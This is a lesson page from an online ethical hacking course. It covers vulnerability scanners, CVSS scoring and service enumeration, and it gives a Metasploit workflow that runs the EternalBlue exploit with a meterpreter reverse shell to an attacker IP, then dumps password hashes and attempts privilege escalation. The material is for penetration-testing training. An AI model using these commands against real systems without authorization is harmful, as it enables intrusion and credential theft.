Ethical Hacking & VAPT
Ethics, Law & Pentest Methodology Reconnaissance & OSINT Scanning, Enumeration & Exploitation Password Attacks & Privilege Escalation Pentest Reporting & Bug Bounty
Progress: 0%
Ethical Hacking & VAPT

Scanning, Enumeration & Exploitation

65 min

Vulnerability Scanning

After reconnaissance, systematically scan for known vulnerabilities in identified services and applications.

VULNERABILITY SCANNERS ───────────────────────────────────────────── Nessus (Tenable) → Industry standard; 70,000+ plugins OpenVAS/GVM → Open source alternative to Nessus Nikto → Web server scanner (quick + noisy) OWASP ZAP → Web application scanner Nuclei → Fast template-based scanning Qualys → Cloud-based enterprise scanner ───────────────────────────────────────────── CVE Scoring (CVSS v3): 0.0 = None 0.1-3.9 = Low 4.0-6.9 = Medium 7.0-8.9 = High 9.0-10.0 = Critical ← Immediate action required

Service Enumeration

  • SMB (445)enum4linux, smbclient — enumerate users, shares, OS
  • SMTP (25) — User enumeration via VRFY/EXPN commands
  • SNMP (161) — Community string brute force; exposes system info
  • LDAP (389) — Enumerate Active Directory objects
  • FTP (21) — Check for anonymous login; directory listing

Metasploit Framework

The world's most widely used penetration testing framework. Provides exploit modules, payloads, and post-exploitation tools.

METASPLOIT BASIC WORKFLOW ────────────────────────────────────────────────────── msfconsole # Start Metasploit search ms17-010 # Search EternalBlue exploit use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 # Target IP set LHOST 192.168.1.50 # Attacker IP set payload windows/x64/meterpreter/reverse_tcp run # Launch exploit # Post-exploitation (Meterpreter): sysinfo # System information getuid # Current user hashdump # Dump password hashes getsystem # Privilege escalation attempt ──────────────────────────────────────────────────────
Previous
Login to Track Progress Next